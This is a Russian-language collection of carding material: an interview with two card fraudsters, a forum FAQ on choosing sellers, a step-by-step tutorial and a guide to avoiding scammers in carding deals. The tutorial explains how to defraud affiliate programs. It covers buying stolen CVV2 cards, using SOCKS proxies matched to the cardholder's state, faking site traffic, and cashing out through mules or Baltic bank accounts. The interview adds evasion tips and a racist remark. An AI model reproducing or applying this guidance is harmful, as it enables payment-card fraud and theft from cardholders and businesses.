XS: Насколько сложно сейчас быть кардером? Какими знаниями и качествами нужно в первую очередь обладать? Какова специфика современного кардерства, изменилось ли что-то по сравнению с прошлыми годами?

dos: Сейчас кардинг переживает не самые лучшие времена. Знания зависят от направления кардерства. Если это интернет, то надо уметь хорошо организовать защиту и анонимность. Если это реальный кардинг, то очень кстати приемы НЛП и обаяние.

ВГ: Ничего не изменилось. Кардерство всегда было занятием для дебилов. Это не хакерство, где нужны знания в области операционных систем и программирования. В кардерстве не нужно иметь каких-то специализированных знаний. Большинство "нынешних" кардеров - очень тупые люди, не умеющие делать НИЧЕГО, кроме того, чтобы где-то что-то красть.

XS: Какие сейчас самые популярные способы кардерства? Какие считаются самыми профессиональными (требующими высокой квалификации)?

dos: Самого популярного способа не существует, каждый зарабатывает как может. Самыми профессиональными, наверное, являются взломы банковских каналов передачи данных и различных алгоритмов шифрования электронных подписей.

ВГ: Самые популярные, наверное, аукционы. Потому что они требуют минимума знаний. Точнее, вообще их не требуют. Самый профессиональный, скорее всего, пластик. В нем хотя бы надо понимать устройство и алгоритм работы.

XS: Каково, по-твоему, соотношение серьезных кардеров (людей, которые углубленно изучают новые системы денежных платежей и внедряют свои способы обхода защиты) к парням, ищущим легкого хлеба при минимуме затрат времени?

dos: Вокруг кардинга крутится огромное количество народа, но реально что-то делает только один процент из них. Легкого хлеба в кардинге нет в принципе. Может быть, в 1997 можно было что-то поиметь, не утруждая себя изучением темы, но не сейчас.

ВГ: Матерых сейчас очень мало. 70%, если не больше - шушера, которая тупо делает copy/paste информации из какого-нибудь текстовика paypal.txt в веб-браузер. Да, они, возможно, знают все настройки и возможности аккаунтов в этой платежной системе, но лично я не считаю это серьезными познаниями из области кардинга, так как все это знают большинство юзеров, пользующихся системой легально.

XS: Как ты думаешь, имеет ли кардинг "наркотический эффект"? Возникает ли привыкание к легким деньгам, и насколько оно серьезно?

dos: Что-то такое есть. Как-то я с температурой 40 не мог отойти от компа, потому что очень хорошо кардилось.

ВГ: Имеет эффект осознания того, в какой жопе мы живем в нашей стране и насколько абсурдна и ничтожна тут жизнь. Хотя у каждого по-разному. Тут, опять же, все зависит от самого человека. Для кого-то это не более чем игра, цель которой - сделать гадость другому.

XS: Насколько активно правоохранительные органы борются сейчас с кардерами? Насколько успешно у них это получается? Какие организации занимаются проблемами кардерства? Из-за чего обычно попадаются кардеры?

dos: Борются, причем очень даже неплохо. Занимается этим ФСБ совместно с банками. Примерно раз в полгода устраивают облавы. Попадаются кардеры из-за своей неосторожности, а также из-за подстав.

ВГ: По-моему, активности с их стороны вообще нет. Там ведь тоже не идиоты работают. Понимают, что им нет смысла тратить свои силы, время и деньги на то, чтобы "спасать" граждан США (или любой другой страны). Делать ту работу, которой должна заниматься забугорная полиция. Хотя с отморозками, которые пытаются кидать здесь (на территории России) - с ними борются. Но таких, по-моему, очень мало. С ними в основном разбирается внутренняя служба безопасности конкретного банка.

XS: Были ли проблемы с ментами лично у тебя? Если да - расскажи, как попался и из-за чего. Чем все кончилось?

dos: У меня проблем не было. Но был случай, когда я весь вечер кардил, а потом заметил, что работаю без прокси-сервера. То есть меня потенциально могли без проблем выследить. Потом неделю ходил по улицам, оглядываясь. Все казалось, что за мной следят.

ВГ: У меня? Проблемы? О чем ты? Я законопослушный гражданин и честно плачу налоги.

XS: Какие основные правила должен знать каждый кардер (если не хочет, чтобы его прижучили)?

dos: Надо соблюдать анонимность. Работать с людьми, которым доверяешь. И не болтать много о том, какой ты крутой кардер.

ВГ: Те же, что и у хакера: не светить свой IP, не светить свои данные. Проще говоря, делать так, чтобы улик твоей причастности к какому-либо делу было как можно меньше. Или вообще не было.

XS: Существуют ли в России профессиональные команды, которые имеют ежемесячный оборот средств от кардинга в сотни тысяч или даже миллионы долларов?

dos: Существуют. Называть их, естественно, не буду. Такие команды принято называть семьями. Но чисто российскими их нельзя назвать, так как они рассредоточены по всему миру.

ВГ: Смотрите новости по ти-ви, там про них в последнее время что-то часто стали рассказывать.

XS: Возможно ли сейчас обуть с помощью кардерства за раз на гигантскую сумму? Скажем, на десять миллионов баксов? Как это возможно в общих чертах?

dos: Можно, но очень-очень трудно. Можно, например, проникнуть в банковскую сеть так, чтобы никто не заметил, и с нескольких счетов перевести бабки на свой. Потом надо снять бабки со счета, пока банк ничего не просек, и убираться на какой-нибудь остров в Тихом океане.

ВГ: Несмотря на то, что определение кардерства по-прежнему "махинации с кредитными картами", на самом деле сейчас это уже более обширная тема. В нее влились такие направления, как махинации со счетами в разных платежных системах (PAYPAL, например). В силу развития интернет-технологий и электронных платежей, "обуть" можно и на 100 миллионов, но тогда это уже будет не кардерство, а хакерство. Или как это официально называется в США - identity theft. Ты берешь чужой логин и пароль от доступа через интернет к его банковскому счету, и, если там лежат 100 миллионов, переводишь их на свой счет. Что касается кредиток... как я уже сказал ранее, смотрите телевизор. Там рассказывается и о методах, и о суммах, которые имеются с этих методов.

XS: Расскажи, какие сейчас самые навороченные способы защиты, применяемые в кредитных картах? И в общих чертах способы их обхода, применяемые кардерами.

dos: Да, как таковых, новых способов нет. Вот виза, например, недавно взяла и резко сократила процент непроверенных транзакций, из-за этого многие биллинги закрылись, и кардеры потеряли еще одну возможность зарабатывать.

ВГ: Принцип работы всех кредитных карт одинаков. И применительно к сети нельзя говорить о способах защиты самих карт. Тут они не играют уже никакой роли. Другое дело - способы защиты передачи и хранения информации с этих карт в интернете. А эти способы, как показывает практика, полная херня... Так как сейчас 80% (или даже 90%) всех кардерских дел осуществляется через интернет, то все вертится вокруг кражи информации из интернета. И тут все как обычно...

XS: Отличается ли чем-то кардинг в России от кардинга в других странах? Например, в Америке? Может, есть какая-то своя специфика.

dos: Каждый американец с рождения трясется за свою кредитную историю, в которую заносятся все крупные покупки и т.п. Если человек будет замешан в чем-то плохом, это сразу же отразится на его кредитной истории. И потом ему не дадут кредит, не примут на работу. Поэтому большинство американских кардеров являются эмигрантами из СНГ.

ВГ: Ага, отличается. Там преобладают негры.

XS: Существует ли кардерская "сцена" как таковая? Есть ли в carders community свои звезды, легендарные личности? Насколько развито и велико сообщество кардеров?

dos: Конечно, есть. Называть имена не буду. Трудно оценить все сообщество кардеров. В России, думаю, несколько тысяч человек.

ВГ: Про это в вашем журнале уже рассказывал один мальчик год или два назад.

XS: Какие сайты/IRC-каналы являются центровыми для кардеров? Где собираются действительно знающие люди? Какие самые, на твой взгляд, достойные сетевые ресурсы по теме кардерства?

ВГ: Достойные люди не собираются на сайтах или тематических кардерских каналах. Carder.uk - про него уже писали. Те, кто интересуется кардингом, могут обращаться туда.

XS: Какие страны в мире (и в СНГ) являются лидерами по кардерской активности? Существует ли какая-то зависимость, например, от общего уровня жизни?

dos: В мире: Россия, Америка. В СНГ: Россия, Украина. Зависимости не существует из-за того, что все деньги, которые получают кардеры, распределяются в пределах небольшой группы.

ВГ: В мире - Индонезия, а также страны бывшего соцлагеря. В СНГ - Украина, Россия, Прибалтика.

XS: Каким ты видишь кардерство через десять лет? Куда все, по-твоему, идет?

dos: Через десять лет, имхо, исчезнут, наконец, кредитные карты. Но, несомненно, будут люди, которые будут заниматься электронными махинациями с денежными потоками. В том виде, в котором кардинг существует сейчас, все движется к закату кардинга.

ВГ: С развитием беспроводных технологий и базирующихся на этом технологий оплаты товара, а также технологий "физической" оплаты картами через интернет (когда, чтобы сделать оплату на сайте, ты должен вставить свою или чужую карту в кардридер, подключенный к компьютеру, и ввести несколько пин-кодов), кардинг превратится в нечто среднее между фрикингом и хакерством. Придется красть информацию, а потом применять ее путем эмуляции через какое-то устройство.

XS: Что бы ты посоветовал парням, которые не знают, что такое кардинг и как это вообще, но хотят легких денег, хотят стать кардерами?

dos: Главное - не надеяться, что деньги сразу потекут рекой. Кардинг - очень трудное занятие. Для начала надо просто начать тусоваться на кардерских форумах, вникать в тему, задавать вопросы. Через некоторое время, возможно, подвернется какая-нибудь работа. Или ты сам поймешь, что твоих знаний уже достаточно для занятия кардингом. Важно понять, что никакой добрый дядя не станет объяснять, что и как делается - до всего придется в основном доходить самостоятельно.

ВГ: Легкие деньги бывают редко. Поэтому, если хочешь хорошей и человеческой жизни, учись, получай качественные профессиональные знания и уезжай отсюда на@^#! Вообще я не собирался становиться кардером, просто знал, что есть такие люди. Но как-то друг навел на один из кардерских форумов. Сначала почитал из любопытства, потом решил попробовать. Купил на свои деньги информацию о нескольких кредитных картах, и пошло-поехало.

В данном FAQ приведены несложные рекомендации, которые помогут вам при покупке товаров или заказе услуг выбрать надежного продавца и не стать жертвой мошенников. Обращаю внимание, что это рекомендуемые, а не критические требования и не все, кто им не соответствуют, непременно мошенники.

1. Положительные отзывы. Хорошие продавцы обычно имеют много рекомендаций довольных клиентов. Начинайте именно с проверки отзывов на ресурсе, обычно они публикуются в теме с предложением. Отзывы можно подделать, потому обращайте внимание на то, сколько времени прошло с момента регистрации "довольного клиента" до момента написания им отзыва в топике, а также, сколько всего сообщений оставил пользователь, кроме написанного отзыва. Дорогого стоят отзывы старых и авторитетных участников. Возможно, продавец опубликовал на проекте несколько предложений, и в каждом из них вы найдете отзывы о работе с ним.

2. Отсутствие жалоб в разделе Арбитраж проекта. Все жалобы от клиентов (и не только) обычно публикуются и рассматриваются администрацией в разделе Арбитраж проекта, не забывайте заглянуть туда при оценке надежности продавца.

3. Наличие успешных сделок через ГАРАНТ-сервис. После проведения успешной сделки, представитель ГАРАНТ-сервиса всегда информирует об этом других участниках в теме продавца. Писать от имени ГАРАНТ-сервиса могут только Супер-модераторы и Администраторы проекта. Отзыв от ГАРАНТ-сервиса надежнее любых отзывов пользователей.

4. Статус ПРОВЕРЕННЫЙ ПРОДАВЕЦ. Статус участника на форуме должен быть максимально высоким, на нашем форуме администрация рекомендует работать только с участниками со статусом ПРОВЕРЕННЫЙ ПРОДАВЕЦ. Данные участники выделяются зеленым цветом, они проходят проверку администрации на качество товара/услуг. Мы проверяем наличие профилей на других ресурсах, наличие негативной и положительной информации в поисковиках, и информируем об этом других участников ресурса.

5. Оплаченная реклама. Посмотрите, есть ли у продавца платная реклама. Обычно мошенникам это не требуется, у них иная задача, раскидать предложения по интернету, найти жертву и обмануть. С другой стороны, надежные и честные селлеры, которые хотят постоянно продавать свой товар на площадке, в большинстве случаев, покупают рекламные места. (!) Оплаченная реклама еще не означает, что это ПРОВЕРЕННЫЙ ПРОДАВЕЦ, заказать рекламу можно и без прохождения проверки.

6. Работа через ГАРАНТ-сервис. Вы всегда можете проводить сделки через ГАРАНТ-сервисов сторонних форумов. ГАРАНТ-сервис – это надежная защита от мошенников, но только, если вы не забываете про остальные 9 пунктов данного FAQ.

7. Не гонитесь за дешевизной. Уважающие свою работу продавцы имеют достаточно клиентов и хорошо знают рынок, потому никогда не станут продавать свои товары/услуги за копейки. Дешевая цена – инструмент мошенников, а ваша жадность может привести к бедности.

8. Также не забывайте что темы проверенных продавцов помещаются в раздел Проверенные селлеры

Удачных Вам покупок.

Как делали бизнес новички кардинга

В этой статье будет описан один из немногих способов кардинга, интересный для новичков в этом деле. Сразу предупрежу, что все нижесказанное не следует применять на практике, т.к. это противозаконно и может повлечь наказание по статьям 272, 273 УК РФ, а также рассматриваться как мошенничество. Автор статьи никогда не использовал эти материалы на практике. Статья написана исключительно в образовательных целях.

Давай вкратце рассмотрим основную идею этого метода. В интернете есть множество организаций, которые делают в Сети бизнес. Очень часто можно встретить сайты, на которых предлагаются услуги хостинга, аренды серверов, продаются темплейты и скрипты для веб-мастеров. Эти компании различным образом рекламируют свои услуги, и одним из методов рекламы являются партнерские программы. Они могут быть разными, но в большинстве случаев тебе предлагают рекламировать на своем сайте товар или услугу, обычно посредством баннера. За каждого клиента, пришедшего по ссылке с твоего сайта и купившего этот товар, ты получаешь процент или некоторое фиксированное вознаграждение. Поскольку такие услуги или товары обычно являются виртуальными, то компания предлагает удобные способы их оплаты, такие, как электронные платежные системы, и, конечно, кредитные карты. В общем, если у тебя есть раскрученный веб-проект с большой посещаемостью, ты можешь работать по партнерской программе вполне легально.

А теперь подумай, что произойдет, если кто-нибудь сделает сайт, создаст видимость его нужности и посещаемости и разместит на нем баннеры партнерской программы. Допустим, его партнером будет компания, предоставляющая услуги хостинга. Далее - он сам выступает в роли покупателя: заходит на свой сайт, кликает по баннеру и попадает на страницу партнера. Выбирает интересующий его тарифный план и покупает хостинг. Только вот покупать он его будет не на свои деньги, а на чужую кредитную карту. В итоге все довольны: партнер приобрел клиента, а кардер получил процент от сделки. Как получить этот процент и превратить его из виртуальных денег в реальные и будет подробно описано ниже.

Итак, для начала необходимо:
  1. Стартовый капитал (примерно 300-400 долларов).
  2. Знание HTML, графических редакторов.
  3. Начальные знания английского языка (знания других языков приветствуются).
  4. Компьютер, доступ в интернет, прямые руки, немного серого вещества в голове.
Предполагаемая прибыль: от $500 в месяц и выше.

Подбираем партнера

Для начала нам надо подобрать партнера, чьи услуги или товары придется рекламировать. Искать партнера среди наших компаний и компаний на территории бывшего СССР бесполезно. Во-первых, потому, что это нарушает неписаные законы кардеров, во-вторых - потому, что нехорошо обманывать своих. Тем более что за бугром подобных компаний намного больше, да и платят они очень приличные деньги. Найти партнера несложно, для этого надо зайти в гугл (www.google.com) и набрать в строке поиска: «affiliates program» (партнерская программа). По запросу гугл выведет огромное количество компаний, предлагающих различные товары и услуги и приглашающих тебя стать их партнерами. Не стоит кидаться на первый попавшийся сайт, сначала лучше пройтись по разным компаниям и изучить их условия. Лучше всего, конечно, найти партнера, который будет выплачивать заработанное с помощью WebMoney или на E-Gold. Компании же, предлагающие такие способы выплат, как paypal или наличные, следует отметать сразу.

Далее нас будут интересовать способы оплаты, которыми клиенты могут заплатить за их услуги. Естественно, нам нужен способ оплаты по кредитной карте. Теперь надо обратить особое внимание на то, что именно предлагает будущий партнер. Товар должен быть виртуальным. Книги, футболки, а тем более ноутбуки не подходят. На мой взгляд, лучше всего рекламировать хостинг и темплейты. Ну а самый сладкий кусочек - услуга dedicated servers (аренда сервера). Стоит это удовольствие недешево, поэтому и проценты кардер получит немаленькие.

Теперь следует проверить, насколько легко скардить данный товар или услугу. Попробуй сначала сам, и если все пройдет нормально, то эта компания нам подходит. Да, пока не забыл – обрати внимание на то, как часто можно получать свои деньги. Я думаю, не стоит работать с компанией, которая выплачивает проценты раз в полгода. К счастью, таких маньяков почти нет.

Кроме того, есть такое понятие, как «первоначальный холд» - это время, в течение которого твои первые деньги замораживаются. Мне кажется, что оптимальным выбором будет компания, выплачивающая деньги раз в неделю и имеющая первоначальный холд 2 недели. Но это большая редкость, обычно выплаты производят раз в месяц.

Итак, подведем краткие итоги. Партнер должен:
  1. Находиться за пределами бывшего СССР.
  2. Принимать к оплате кредитные карты.
  3. Выплачивать проценты по WebMoney, Bitcoin или wire transfer (банковский перевод).
  4. Легко кардиться.
  5. Продавать виртуальный товар.
  6. Производить выплаты не реже раза в месяц.
Делаем сайт а-ля «Рога и Копыта»

Ну что ж, партнера ты нашел, теперь нужен сайт, который будет его рекламировать. Для начала следует определиться с хостингом и доменным именем. Хостинг и домен точно не должны быть нашими. Западные компании как огня боятся людей из СНГ, думая, что все мы - мошенники.

Все это добро можно, разумеется, скардить, но хостинг лучше купить. Обойдется он не очень дорого, бери самый дешевый тарифный план, т.к. базы данных и всякие примочки, типа ssh доступа, тебе вряд ли понадобятся. Домен можно и скардить, но и купить тоже можно, поскольку стоит он недорого. Будет очень обидно, если после месяца работы у тебя все это отберут, и ты не успеешь даже окупить потраченные деньги. Домен лучше зарегистрировать в зоне .com, .net, .org.

Теперь придется поработать веб-мастером. Твой сайт должен иметь идею. Это не должна быть страничка Васи Пупкина. Можно, например, сделать развлекательный сайт, онлайн-журнал обзора новинок железа-софта или то, что тебе ближе всего. Учти, что почти все западные компании откажутся с тобой работать, если на твоем сайте будет порнография, призывы к расизму, пропаганда оружия или наркотиков. Тема должна быть привычная, не вызывающая подозрений и лишних вопросов.

Дизайн сайта должен быть добротным. Совсем не стоит делать летающие звезды или прыгающих зайцев, то есть - всего того, что в народе называют попсой. Выбери спокойные цвета, привычный дизайн. Твой партнер обязательно захочет взглянуть на проект, и он никоим образом не должен вызывать подозрений. Можно пойти и более хитрым путем, например, сделать сайт на китайском языке, чтобы партнеры ничего не поняли. Делается это легко: достаточно зайти на любой китайский сайт, скопировать оттуда много иероглифов, и, поменяв их местами, вставить в свой сайт. Это очень удобное решение, поскольку вопросов будет меньше, да и партнер будет рад - ведь китайцев целый миллиард, и это очень большой рынок будущей клиентуры.

После того как проект будет готов, можно идти на сайт партнера и регистрироваться. Если все пройдет нормально и у него не появятся лишние вопросы, в скором времени ты получишь письмо с поздравлениями и дальнейшими инструкциями. Вешай на свой сайт баннеры и приступай к дальнейшей работе.

Подведем краткие итоги. Наш сайт должен иметь:
  1. Хостинг и домен, которые не указывают на принадлежность к СНГ.
  2. Смысл и идею, которая не вызовет подозрений у партнера.
  3. Добротный дизайн, контент и структуру.
Особенности вбива

Теперь, когда у тебя есть сайт, который рекламирует партнера, самое время для торжественной части. Тут много тонкостей. Про все рассказать не удастся, т.к. у каждого партнера свои заморочки. Но основные принципы обсудить стоит. Прежде всего, тебе понадобятся сами карты, которые ты будешь вбивать (расплачиваться за услуги спонсора). Если у тебя уже есть своя база или ты можешь взламывать интернет-магазины, то одна из статей расходов исчезает. Ну а если нет, то это совсем не проблема. Я думаю, не стоит объяснять, что сгенерированные карты уже давно никто не принимает. Карты (далее - сс) всегда можно купить в интернете у людей, которые занимаются их добычей и продажей. Найти продавца сс можно на кардерских сайтах и форумах. При выборе продавца обязательно узнай, насколько он надежен. Обычно на форумах можно посмотреть дату его регистрации и отзывы других покупателей. Тебе понадобятся карты с CVV2 кодом. Скорее всего, ты будешь использовать сс из Америки. Средняя цена в интернете - $2 за одну сс.

Бери сразу не одну-две сс, а штук 50-100. В этом случае ты можешь получить скидку от продавца. Лучше всего покупать дебитные сс, поскольку чарджбэк по ним идет дольше, месяца 3-4.

Однако карты - это еще не все. Стоит позаботиться и о своей безопасности. Для этого тебе понадобятся прокси-серверы. Не стоит надеяться на прокси, взятые из публичных источников, т.к. большинство процессингов также имеют эти списки и строго следят за тем, чтобы клиент, производящий оплату, не зашел под ними. Нам понадобятся SOCKS прокси. Желательно, чтобы прокси, которыми ты будешь пользоваться, были того же штата, что и твоя сс. Поэтому приобретать их тебе придется у людей, которые специально предоставляют подобные сервисы. Найти их можно также на кардерских форумах. В среднем, доступ к базе анонимных прокси будет стоить в месяц $60.

Но и это еще не все. Что подумает партнер, когда обнаружит, что из трех пользователей в день, заходящих к тебе на сайт, все тут же кликают на баннер и покупают его услуги? Ситуация очень странная. Могу сказать сразу, что письма партнеру с лестными отзывами о баннерах, имеющих КПД 100%, вряд ли его убедят. Значит - наш сайт должен иметь хорошую посещаемость, или хотя бы делать вид, что он ее имеет. В среднем КПД баннера – 0,1%, так что не будем отступать от этого правила - на каждый вбив создавай трафик около 1000 пользователей. Сделать это можно по-разному. Можно самому написать скрипт, можно найти бесплатные скрипты в интернете или купить. Но самый простой вариант - это купить трафик. Стоимость разная, в среднем - $1 за 1000 посещений. Люди, которые этим занимаются, называются трафагонами, и их всегда можно найти на тех же кардерских форумах.

Если все вышеперечисленное у тебя есть, можешь начинать работать. Сколько карт в день вбивать - зависит от твоей наглости. Если ты будешь вбивать по 1-2 сс в день, это будет вполне нормальный вариант.

Итак, для успешного вбива необходимо:
  1. Иметь карты.
  2. Иметь прокси того же штата, что и карта.
  3. Нагнать трафик на свой сайт.
Забираем кеш или тонкости обнала

Допустим, все прошло успешно, и ты работаешь уже месяц. Естественно, пора подумать о том, как забрать свои деньги, пока не пошли чарджбэки. Если твой партнер высылает деньги на WebMoney или E-Gold, то все очень просто – достаточно зарегистрировать аккаунт в нужной системе и перечислять туда деньги. Как обналичить Webmoney, я думаю, все знают, об этом подробно написано на их сайте. В случае с E-Gold пугаться тоже не стоит. В интернете много контор, занимающихся обменом – о них ты прочитаешь в статье «8 хитрых способов обнала денег с кред».

Сложнее, если тебе будут перечислять сумму посредством банковского перевода. Хотя вся сложность состоит в том, что придется найти нальщика. Как всегда, найти его можно на кардерских форумах. Нальщик возьмет с тебя процент (какой именно - ты договоришься с ним). Также придется договориться и о том, как тебе удобнее будет получить деньги. Надо сказать, что обналичивание денег - один из самых главных моментов. Прежде чем обращаться к нальщику, стоит посмотреть его рекомендации. Если нальщик хороший, то люди, работавшие с ним, обязательно оставят о нем отзывы. Тут может возникнуть проблема: обычно нальщику, особенно если он профи, не очень выгодно работать с суммами меньше $1000. Поэтому меньшую сумму он может и не принять. В этом случае можно действовать по-разному: можно все же уговорить его принять $500, а можно просто подкопить еще денег на счету.

Кстати, с нальщиком лучше договориться заранее, еще до подключения к партнерской программе. Дело в том, что счет, на который будут идти твои деньги, возможно, придется указывать во время регистрации. Лучше, если все будет готово заранее. Это избавит от непредвиденных сюрпризов.

Для обналичивания подойдет обычный счет где-нибудь в Латвии. При особом желании и наличии лишних денег счет можно открыть самому, а можно купить уже готовый. Большинство прибалтийских банков могут открыть счет без личного визита к ним. Для этого тебе понадобятся ксерокопии некоторых документов (каких именно - зависит от банка). После чего их надо послать по почте или по факсу. Если все пройдет удачно, то ты получишь конверт, в котором будет дебетная карта (Visa Electron или Cirrus/Maestro) с пин-кодом, а также инструкции для онлайнового управления счетом. Такой счет будет очень полезен и в дальнейшем. Он обязательно окупится, если, конечно, не запороть его после первого же перевода. Кроме того, теперь уже не придется отдавать проценты нальщику, и появится возможность обналичивать суммы меньше $1000.

В правилах партнера необходимо внимательно прочитать, в какие страны он может делать переводы. Если этого нет в правилах, придется написать письмо в службу поддержки и спросить об этом. Может оказаться, что они переводят деньги только в пределах США или другой страны.

В общем, для обналичивания денег нужно:
  1. Иметь счет для обнала (свой или предоставленный нальщиком).
  2. Иметь необходимую сумму на счету у партнера.
  3. Превысить первоначальный холд (если он есть).
Одним выстрелом двух зайцев

Если все было сделано правильно, то уже через месяц-полтора в твоем кармане осядет некоторая сумма денег. Как долго будет работать проект - зависит только от тебя и от жадности кардхолдеров. За месяц проект может легко окупиться, плюс принести некоторую прибыль. Дальше все деньги будут идти уже тебе в карман. Но, как всегда, денег хочется больше. И это, в принципе, не проблема.

Допустим, ты рекламируешь хостинг своего партнера. А зачем выбрасывать на помойку честно накарженный товар? Куда более разумным решением будет продать этот хостинг, например, в два раза дешевле. Попробуй найти людей, которым он будет нужен. Если продавать его на кардерских форумах, то лучше сразу предупредить покупателя, что товар скаржен, чтобы избежать дальнейших разборок. Лучше будут продаваться темплейты, т.к. они уже есть и их не закроют, как, например, хостинг. Самое выгодное - это, как я говорил, dedicated servers. Их можно использовать и в своих целях.

И в заключение...

Я постарался показать, что кардинг - это все же творческий процесс. Главное верить в свои силы, и тогда все должно получиться. Сначала все кажется очень сложным, но если потратить немного времени, то картина быстро проясняется. Конечно, на пути тебя будут подстерегать неожиданности, но рассказать обо всех невозможно. Связанно это с тем, что многое меняется очень быстро, да и в каждой компании свои правила и порядки. Думаю, многие меня осудят, сказав, что кардинг - это противозаконно и аморально. Совершенно с этим согласен, поэтому никого не призываю заниматься чем-то подобным.

Но не кидайся на первый попавшийся сайт, сначала пройдись по разным компаниям и изучи их условия.

Ну а самый сладкий кусочек - услуга dedicated servers (аренда сервера). Стоит это удовольствие недешево, поэтому и проценты будут немаленькие.

Дизайн сайта должен быть добротным. Совсем не стоит делать летающие звезды или прыгающих зайцев, то есть всего того, что в народе называют попсой.

Тебе понадобятся SOCKS прокси. Желательно, чтобы прокси, которыми ты будешь пользоваться, были того же штата, что и твоя сс.

Лучше всего покупать дебитные сс, поскольку чарджбэк по ним идет дольше, месяца 3-4.

Для обналичивания подойдет обычный счет где-нибудь в Латвии. При особом желании и наличии лишних денег счет можно открыть самому, а можно купить уже готовый.


Основу проблемы <кидков> создают доверчивые люди которых обманывают, ведь в 90% случаев обмана человек переводит деньги или оказывает услуги <вперёд> , основная масса кинутых в кардинге и в других сферах - новички , которые либо не до конца разбираются в том чем занимаются, что даёт кидале дополнительный шанс обмануть жертву, сыпя терминами, либо слишком доверчивы, так что если вас обманули в большинстве случаев можете записывать себя в ряды новичков или доверчивых. Ещё запомните фразу <скупой платит дважды> в контексте кидал она как никогда актуальна.

Как становятся кидалами или с чего начинается обман:

В своём большинстве кидалами становятся те кто не смог достичь каких-либо успехов в том чем занимается он и его окружение.

В итоге человек разочаровавшись видит что другие зарабатывают что-то а он ничего не получает. Сразу на ум приходит мысль - <а почему бы не взять у своих> . Чаще всего кидалы получаются из тех кто купил енролл, попробовал заняться вещевухой, у него ничего не вышло но енролл ещё не сдох и он берёт на каком-то форуме постит <продаю енролл mbna>, к нему стучится пару человек и он ВСЕМ им продаёт этот енролл. Вроде обмана как такового нет - все получили то что хотели (фактор продажи товара в несколько рук мы не рассматриваем) однако с очень большой вероятностью никто из купивших рол ничего не добьется и примкнёт к стае <обиженных и угнетённых>, это первая стадия.

Дальше он вспомнив ход сделок, опять запостит <продаю енролл сити> (так как он дороже) к нему постучит 10 человек из которых 7 нормальных а 3 новичка , 7 не захотят с ним работать так как он не даст логин и пароль вперёд (у него их нет) а трое возьмут да и купят, переведя wmz. Вывод - кидала почувствует деньги и навсегда останется мошенником , даже в дальнейших возможно честных сделках первая мысль у него будет <а как же мне обмануть>.

Признаки обмана и кидалы:

кидала хочет получить деньги быстрее и ему все равно на исход сделки так как при <удачном> раскладе он все равно останется в плюсе , так что первая характерная черта кидал - спешка, они придумывают кучу побочных факторов провоцирующих ускорение сделки: беременная жена , блокировка кошелька , беспокойство дропа итак далее, таких <подмазок> можно придумать кучу.

кидала хочет показать себя шарящим человеком поэтому постоянно употребляет не в меру большое количество терминов / специфических слов.

как крутой кардер кидала <живёт в юса> и он <бомж у которого нет денег на русскую клавиатуру>, посему он пишет транслитом, но иногда (при длительном общении) проскакивают фразы на русском. Стандартным ответом если его напрячь по данному вопросу (теоретически) будет <я общаюсь с нерускоговорящими партнёрами> , однако сам он ни на английском ни на китайском ни 1 слова не знает (это легко проверить стукнув ему с другой аси).

кидала пишет по исключительно на английском - первый напрашивающийся вывод - <он иностранец и на русском не муму> такой вывод обычно сразу повышает уровень доверия. Так же факт незнания языка, грамматические ошибки и постоянных смайлы или знаки вырывающихся эмоций. По типу "ой как чешутся руки, и ещё чуть-чуть и я его обману и кину". В большинстве случаев это либо реальные олени/домохозяйки которые на русском не говорят либо как чаще и бывает наши соотечественники - кидалы. Проверить это довольно просто, как и в вышеописанном пункте стукнуть с другой аси , основные варианты стука: предложить ему то от чего он не сможет отказаться, постучать от имени <Маши> у которой заполнена вся инфа в асе и которая хочет познакомиться, чаще всего кидала клюнет.

ник кидалы. Жадность и несдержанность частенько проявляются в никах которые меняются как перчатки, но как только видим Экспресс, Фаст, Изи и так далее, да еще в придачу с словом бабло, кэш, капуста уже стоит быть осторожным и собственно говоря начинать проверять человека.

номер icq кидалы. Сейчас шестизначные номера аси не является признаком <крутости>, поэтому судить по номеру нельзя. Аналогично с датой регистрации на форуме - пример тому <лука> с cw по этому признаку тоже судить нельзя.

количество постов кидалы - у потенциального кидалы либо слишком маленькое относительно даты регистрации, либо наоборот сильно большое (набивает посты). Перед сделкой с ним, рекомендуется почитать что человек пишет на форумах, и оценить его адекватность , если это тупой набой постов то вывод делайте сами.

Неадекватное поведение/разговор - говорит много не по делу , говорит много о другом деле , хочет сразу с тобой заняться многим , корешится. Так же кидалы очень любят орать что-то типа "да ты кидала?! решил меня кинуть?" как говориться меряют людей по-себе.

Фразы в духе <я на форумах особо не тусуюсь , работаю на заказ итд> такое бывает но редко. Желание работать сразу на большие суммы без предварительной проверки и спешка мол закроется ВЮ офис или отмазки что "тестовыми заливами спалишь дропа" тоже в принципе свидетельствует о том что надо быть осторожным.

Очень много кидал начали делать посты и в конце приписывать, работаю только через гаранта, но когда заходит разговор о сделке появляется куча отмазок и отговорок иногда даже звонки с целью запудрить мозг.

Вывод: ни 1 из перечисленных выше факторов не может говорить о том что чел кидала но в совокупности они дают знать что с ним лучше не иметь дел, общая тактика кидалы - запудрить жертве мозг.

Как проводить сделки:

С непроверенными людьми исключительно через гаранта не пожалейте 10-20$ даже если товар столько и стоит. Если вас кинут - у вас останется негативное впечатление и деньги попадут мошеннику в руки, что как было описано выше скорее всего подвигнет его к новым обманам, а если вы заплатите гаранту и проведёте сделку успешно то у вас будет <проверенный> (не факт что он не кинет вас в последствии на более крупную сумму) селлер и гарант получит свои честно заработанные деньги которые в большинстве случаев пойдут на развитие форумов - все будут рады.

В случае работы без гаранта, работайте только с известными людьми либо только при наличии положительных отзывов (от проверенных участников , чтоб избежать факта самоотписа отзывов). как правило новичкам в этой ситуации приходиться тяжело, особо ничего нет показать, материалы достали и хочется продать, в общем такой замкнутый круг и к сожалению очень много способных начинающих ребят оказывается или обмануты или с ними просто ни кто не хочет работать, в принципе чтобы избежать подобной судьбы советуем начинать потихоньку и без особых понтов.

Если не уверены в человеке - не стоит мучить его, навязывая ему свои хитрые условия сделки, ищите другого. Так как этим вы у нормального человека сложите о себе мнение тормоза, а кидале не дадите вас кинуть тем самым потратив своё и чужое время.

Да в принципе вариантов тут остается маловато.

Или делайте сделки через гарантов или с проверенными людьми, варианты мол дам своего гаранта тоже очень часто могут оказаться обманом.

Вариант 50 сейчас 50 потом работает более-менее гладко, хотя если человек не кидала то дать все 100 вперёд не проблема.

Для уточнения кем является человек , особенно стучащий вам , обязательно просите его отправить вам PM на форуме.

